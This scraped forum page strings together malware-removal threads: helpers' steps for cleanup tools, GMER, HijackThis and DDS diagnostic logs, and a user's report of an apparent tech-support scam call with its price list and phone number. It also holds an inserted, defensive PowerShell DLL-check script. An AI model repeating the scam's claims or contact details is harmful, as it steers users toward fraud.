Channel: Tech Support Guy - Virus & Other Malware Removal

Program Rogue Killer Question

Moved to malware.
Please post the log it made so we can see it and hopefully advise you.

Computer logging online itself and other problems

Hi Mark! I am taking you at your word and seeking advice. I'm trying to decide whether to purchase Windows 7 Home Premium 32-bit or Professional.
I used the Upgrade Advisor and my system will support 7, so I figure it will support either one.
I'm just thinking that Professional would be a better fit for all my older programs that run with XP.
Am I right?
Thanks for your expertise.

Internet Security Pro/ madefender.exe

Quite a lot going on with your system; do the following:

Run FRST one more time from the Recovery Environment:

Type the following in the edit box after "Search:", or copy and paste it:

rpcss.dll;kernel32.dll

Click the Search button and post the log (Search.txt) it makes in your reply.

Kevin
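The FRST search above lists every copy of rpcss.dll and kernel32.dll on the disk so that a patched or misplaced copy can be spotted. As an added example, not from the thread and not FRST's own code, the following PowerShell check asks the same question from a booted system: it enumerates copies of those two names on the system drive and reports location, size and Authenticode status, flagging any copy outside System32, SysWOW64 or WinSxS or without a valid signature. It assumes an elevated Windows PowerShell 5.1 prompt on the affected machine.

```powershell
# Added example, not part of the thread or of FRST. Assumes an elevated
# Windows PowerShell 5.1 prompt on the affected machine.
# Lists every copy of rpcss.dll and kernel32.dll on the system drive (the
# same two names as the FRST search string) and flags copies that live
# outside the directories where Windows keeps them or that carry no valid
# Authenticode signature.

$names = 'rpcss.dll', 'kernel32.dll'
$root  = "$env:SystemDrive\"

# Directories where genuine copies are expected. A copy anywhere else
# (a user profile, Temp, ProgramData) deserves a closer look.
$expected = @(
    "$env:SystemRoot\System32",
    "$env:SystemRoot\SysWOW64",
    "$env:SystemRoot\WinSxS"
)

function Test-ExpectedLocation {
    param([string]$Directory)
    foreach ($dir in $expected) {
        if ($Directory -like "$dir*") { return $true }
    }
    return $false
}

$results = Get-ChildItem -Path $root -Recurse -Force -File -Include $names -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig    = Get-AuthenticodeSignature -FilePath $_.FullName
        $signer = ''
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        $inPlace = Test-ExpectedLocation -Directory $_.DirectoryName

        [pscustomobject]@{
            Path      = $_.FullName
            SizeBytes = $_.Length
            LastWrite = $_.LastWriteTime
            Signature = $sig.Status        # Valid, NotSigned, HashMismatch, ...
            Signer    = $signer
            Review    = (-not $inPlace) -or ($sig.Status -ne 'Valid')
        }
    }

# Copies worth reviewing first, then the rest for comparison.
$results | Sort-Object Review -Descending | Format-Table -AutoSize
```

On older Windows versions such as Windows 7, Get-AuthenticodeSignature does not consult the security catalog, so genuine catalog-signed OS files can report NotSigned; there, treat the location check as the stronger signal and confirm with sfc /verifyonly.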

ltmngul.exe and Conduit malware problem

Welcome.

Download TFC by OldTimer to your desktop.
  • Please double-click TFC.exe to run it. (Note: If you are running on Vista, right-click on the file and choose Run As Administrator).
  • It will close all programs when run, so make sure you have saved all your work before you begin.
  • Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two. Let it run uninterrupted to completion.
  • Once it's finished it should reboot your machine. If it does not, please manually reboot the machine yourself to ensure a complete clean.

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, instead of double-clicking, right-click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

Download AdwCleaner to your desktop.

NOTE: If you are using Internet Explorer and get an alert that stops the program downloading, click on the warning and allow the download to complete.

Close all programs and click on the AdwCleaner icon.

Click on Scan and follow the prompts. Let it run unhindered. When done, click on the Clean button and follow the prompts. Allow the system to reboot. You will then be presented with the report. Copy and paste this report in your next reply.

The report will be saved in the C:\AdwCleaner folder as AdwCleaner[S0].txt.

Please download Malwarebytes' Anti-Malware from here.

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to restart. (See Extra Note.)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the entire report in your next reply.
Extra Note:

If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts; click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it into your reply.
  • The first time the tool is run, it also makes another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.

Running a checkup

(the GMER scan was too long for one post, so this is the second portion of it)
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
---- Processes - GMER 2.1 ----

Library C:\ProgramData\Razer\Synapse\Devices\RazerConfigNative.dll (*** suspicious ***) @ C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [6712] (Razer Configurator/Razer Inc.)(2013-08-28 10:22:22) 0000000055890000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000010000000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000000480000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000002fa0000

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{53909159-70EE-44EB-B73D-281AD170A331}\Connection@Name isatap.{F37099EB-A12B-4A45-935E-BA33BE38797D}
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Bind \Device\{53909159-70EE-44EB-B73D-281AD170A331}?\Device\{4CA3677F-F882-499B-B89F-204FEC1428B3}?\Device\{6606E52C-2B64-497E-AB93-940620B61304}?\Device\{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}?\Device\{95C2E741-9CD5-4F34-B6BA-89A864802C97}?\Device\{A89B145B-4528-42F9-92B0-9A15BE39F0FD}?\Device\{108AC479-5065-49BB-AE8C-DF42D97CB44A}?
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Route "{53909159-70EE-44EB-B73D-281AD170A331}"?"{4CA3677F-F882-499B-B89F-204FEC1428B3}"?"{6606E52C-2B64-497E-AB93-940620B61304}"?"{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}"?"{95C2E741-9CD5-4F34-B6BA-89A864802C97}"?"{A89B145B-4528-42F9-92B0-9A15BE39F0FD}"?"{108AC479-5065-49BB-AE8C-DF42D97CB44A}"?
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Export \Device\TCPIP6TUNNEL_{53909159-70EE-44EB-B73D-281AD170A331}?\Device\TCPIP6TUNNEL_{4CA3677F-F882-499B-B89F-204FEC1428B3}?\Device\TCPIP6TUNNEL_{6606E52C-2B64-497E-AB93-940620B61304}?\Device\TCPIP6TUNNEL_{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}?\Device\TCPIP6TUNNEL_{95C2E741-9CD5-4F34-B6BA-89A864802C97}?\Device\TCPIP6TUNNEL_{A89B145B-4528-42F9-92B0-9A15BE39F0FD}?\Device\TCPIP6TUNNEL_{108AC479-5065-49BB-AE8C-DF42D97CB44A}?
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0cd292295e4f
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\977061000000
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{53909159-70EE-44EB-B73D-281AD170A331}@InterfaceName isatap.{F37099EB-A12B-4A45-935E-BA33BE38797D}
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{53909159-70EE-44EB-B73D-281AD170A331}@ReusableType 0
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{95C2E741-9CD5-4F34-B6BA-89A864802C97}@InterfaceName isatap.{36316754-925E-4EA1-9A7A-BC28B66E7323}
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{95C2E741-9CD5-4F34-B6BA-89A864802C97}@ReusableType 0
Reg HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch2@Epoch 21930
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B64-5150-47F8-9801-8C26B9359248}@LeaseObtainedTime 1399678811
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B64-5150-47F8-9801-8C26B9359248}@T1 1399679261
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B64-5150-47F8-9801-8C26B9359248}@T2 1399679598
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B64-5150-47F8-9801-8C26B9359248}@LeaseTerminatesTime 1399679711
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0cd292295e4f (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\977061000000 (not active ControlSet)

---- EOF - GMER 2.1 ----




I appreciate your time and help! :)

********hacked or scammed, that is the question!?!?!?********************************

I’ve been running a program called System Mechanic. I got a call from them today where they said I was getting attempts from Hackers trying to invade my computer. In the Event Viewer it showed 77 Warnings and Errors (see pic). For all I know it could’ve been THEIR program that installed them in the first place! But I’m not that paranoid…normally. And I wouldn’t have been now if it wasn’t for the fact that after they took over my computer online they then tried to sell me a package to clean up my computer that consisted of the following:

Remove all infection & errors & warnings
Remove red infection
Remove all Hackers zone & trojan virus

Reprogram Network
IP Address security
Home Network security with Internet security lifetime
Anti Hacking Tools lifetime
Block the gateway service for Hackers
Reinstall all protection & programming service
Replace all corrupted files with working files
Replace system mechanic with latest version 12.7 pro with licence key (free Updation)
====================================================
Software warranty with Unlimited tech support (24x7) hrs

2 hrs 2 Tech

3 years - 1 comp = $199.99
Lifetime - 5 comp + all device = $299.99

303-351-5186 phone ext 221


I told them I’d let them know.
So now I don’t know what to believe! I’m sure there is something slowing up my computer but I know it’s not worth the $300.00 they want to charge me. They went on to show me all of the things in the System Configuration box that are STOPPED and claimed they would have to purchase a Microsoft license and have to reload and reconfigure my Network, etc…

So I’m here looking for the truth and how to resolve the issue.
Below is my information:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 6:15:34 PM, on 5/9/2014
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Paltalk Messenger\paltalk.exe
C:\Program Files\RarmaRadio\RarmaRadio.exe
C:\Documents and Settings\Owner\Desktop\meterH.exe
C:\WINDOWS\system32\SNDVOL32.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Owner\Desktop\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: (no name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - (no file)
O2 - BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\coIEPlg.dll
O2 - BHO: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\IPS\IPSBHO.DLL
O2 - BHO: RoboForm - {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O3 - Toolbar: &RoboForm - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O3 - Toolbar: Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\coIEPlg.dll
O3 - Toolbar: (no name) - {434D472D-5637-006A-76A7-7A786E7484D7} - (no file)
O4 - HKLM\..\Run: [ioloGovernor] C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: Customize Menu - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComCustomizeIEMenu.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Fill Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O8 - Extra context menu item: RoboForm Toolbar - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O8 - Extra context menu item: Save Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O8 - Extra context menu item: Search Image on TinEye - file://C:\Documents and Settings\Owner\My Documents\TinEye IE Plugin\TinEye.js
O9 - Extra button: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra 'Tools' menuitem: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra button: Save - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra 'Tools' menuitem: Save Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra button: RoboForm - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra 'Tools' menuitem: RoboForm Toolbar - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {2357B3CF-7F8D-4451-8D81-FD6097610AEE} - http://activex.camfrogweb.com/advanc...instmodule.exe
O16 - DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - http://content.systemrequirementslab...l_4.5.13.0.cab
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: iolo System Service (ioloSystemService) - iolo technologies, LLC - C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: Norton Security Suite (N360) - Symantec Corporation - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe

--
End of file - 6214 bytes



DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 10.55.2
Run by Owner at 18:21:34 on 2014-05-09
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1534.772 [GMT -5:00]
.
AV: Norton Security Suite *Enabled/Updated* {E10A9785-9598-4754-B552-92431C1C35F8}
FW: Norton Security Suite *Enabled*
.
============== Running Processes ================
.
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\HP1006MC.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Paltalk Messenger\paltalk.exe
C:\Program Files\RarmaRadio\RarmaRadio.exe
C:\Documents and Settings\Owner\Desktop\meterH.exe
C:\WINDOWS\system32\SNDVOL32.EXE
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://my.yahoo.com/
uURLSearchHooks: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - <orphaned>
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - c:\program files\norton security suite\engine\21.2.0.38\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - c:\program files\norton security suite\engine\21.2.0.38\ips\ipsbho.dll
BHO: RoboForm: {724d43a9-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\roboform.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
TB: &RoboForm: {724D43A0-0D85-11D4-9908-00400523E39A} - c:\program files\siber systems\ai roboform\roboform.dll
TB: &RoboForm: {724d43a0-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\roboform.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - c:\program files\norton security suite\engine\21.2.0.38\coieplg.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [ioloGovernor] c:\program files\iolo\system mechanic\ioloGovernor.exe
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: Customize Menu - c:\program files\siber systems\ai roboform\RoboFormComCustomizeIEMenu.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000
IE: Fill Forms - c:\program files\siber systems\ai roboform\RoboFormComFillForms.html
IE: RoboForm Toolbar - c:\program files\siber systems\ai roboform\RoboFormComShowToolbar.html
IE: Save Forms - c:\program files\siber systems\ai roboform\RoboFormComSavePass.html
IE: Search Image on TinEye - c:\documents and settings\owner\my documents\tineye ie plugin\TinEye.js
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - c:\program files\siber systems\ai roboform\RoboFormComFillForms.html
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - c:\program files\siber systems\ai roboform\RoboFormComSavePass.html
IE: {724d43aa-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\RoboFormComShowToolbar.html
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {2357B3CF-7F8D-4451-8D81-FD6097610AEE} - hxxp://activex.camfrogweb.com/advanced/2.0.2.3/cfweb_activex.camfrogweb.com-advanced-2.0.2.3_instmodule.exe
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://windowsupdate.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1362001188500
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - hxxp://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.13.0.cab
TCP: NameServer = 192.168.10.1
TCP: Interfaces\{7D688A97-0443-4D60-874A-3B706DCB0ACC} : DHCPNameServer = 192.168.10.1
TCP: Interfaces\{CC5F00C4-DE79-4137-845C-70F378A5F7CA} : DHCPNameServer = 192.168.2.1
Notify: igfxcui - igfxsrvc.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
Hosts: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\owner\application data\mozilla\firefox\profiles\i4463fux.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://my.yahoo.com/
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_12_0_0_77.dll
.
============= SERVICES / DRIVERS ===============
.
R0 SymDS;Symantec Data Store;c:\windows\system32\drivers\n360\1502000.026\symds.sys [2014-4-3 367704]
R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\n360\1502000.026\symefa.sys [2014-4-3 936152]
R1 BHDrvx86;BHDrvx86;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\bashdefs\20140409.001\BHDrvx86.sys [2014-4-19 1098968]
R1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\n360\1502000.026\ccsetx86.sys [2014-4-3 127064]
R1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\n360\1502000.026\ironx86.sys [2014-4-3 206936]
R2 ioloSystemService;iolo System Service;c:\program files\iolo\common\lib\ioloServiceManager.exe [2014-4-24 4492776]
R2 N360;Norton Security Suite;c:\program files\norton security suite\engine\21.2.0.38\n360.exe [2014-4-3 265040]
R2 PDFsFilter;PDFsFilter;c:\windows\system32\drivers\PDFsFilter.sys [2014-4-24 68464]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\common files\symantec shared\eengine\EraserUtilRebootDrv.sys [2013-12-18 108120]
R3 IDSxpx86;IDSxpx86;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\ipsdefs\20140508.001\IDSXpx86.sys [2014-5-9 383120]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-8-12 22856]
R3 NAVENG;NAVENG;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\virusdefs\20140509.004\NAVENG.SYS [2014-5-9 93272]
R3 NAVEX15;NAVEX15;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\virusdefs\20140509.004\NAVEX15.SYS [2014-5-9 1612376]
S0 auavjpga;auavjpga;c:\windows\system32\drivers\wwvdd.sys --> c:\windows\system32\drivers\wwvdd.sys [?]
S2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2013-8-12 701512]
S3 cpudrv;cpudrv;\??\c:\program files\systemrequirementslab\cpudrv.sys --> c:\program files\systemrequirementslab\cpudrv.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-5-9 40776]
S4 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes' anti-malware\mbamscheduler.exe [2013-8-12 418376]
.
=============== File Associations ===============
.
FileExt: .vbe: VBEFile=NOTEPAD.EXE "%1"
FileExt: .vbs: VBSFile=NOTEPAD.EXE "%1"
FileExt: .js: JSFile=NOTEPAD.EXE "%1"
FileExt: .jse: JSEFile=NOTEPAD.EXE "%1"
FileExt: .wsf: WSFFile=NOTEPAD.EXE "%1"
.
=============== Created Last 30 ================
.
2014-05-09 20:15:13 40776 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-04-24 23:05:26 2097984 ----a-w- c:\windows\system32\Incinerator32.dll
2014-04-24 23:05:10 68464 ----a-w- c:\windows\system32\drivers\PDFsFilter.sys
2014-04-24 23:05:09 41616 ----a-w- c:\windows\system32\iolobtdfg.exe
2014-04-24 23:05:09 23568 ----a-w- c:\windows\system32\smrgdf.exe
2014-04-24 23:05:09 -------- d-----w- c:\documents and settings\all users\application data\ioloGovernor
2014-04-24 23:05:07 -------- d-----w- c:\documents and settings\owner\application data\ioloGovernor
2014-04-24 23:05:06 56200 ----a-w- c:\windows\system32\offreg.dll
2014-04-24 23:04:58 -------- d-----w- c:\program files\iolo
2014-04-24 23:02:34 74703 ----a-w- c:\windows\system32\mfc45.dll
2014-04-24 23:02:34 -------- d-----w- c:\documents and settings\owner\application data\iolo
2014-04-24 23:02:34 -------- d-----w- c:\documents and settings\all users\application data\iolo
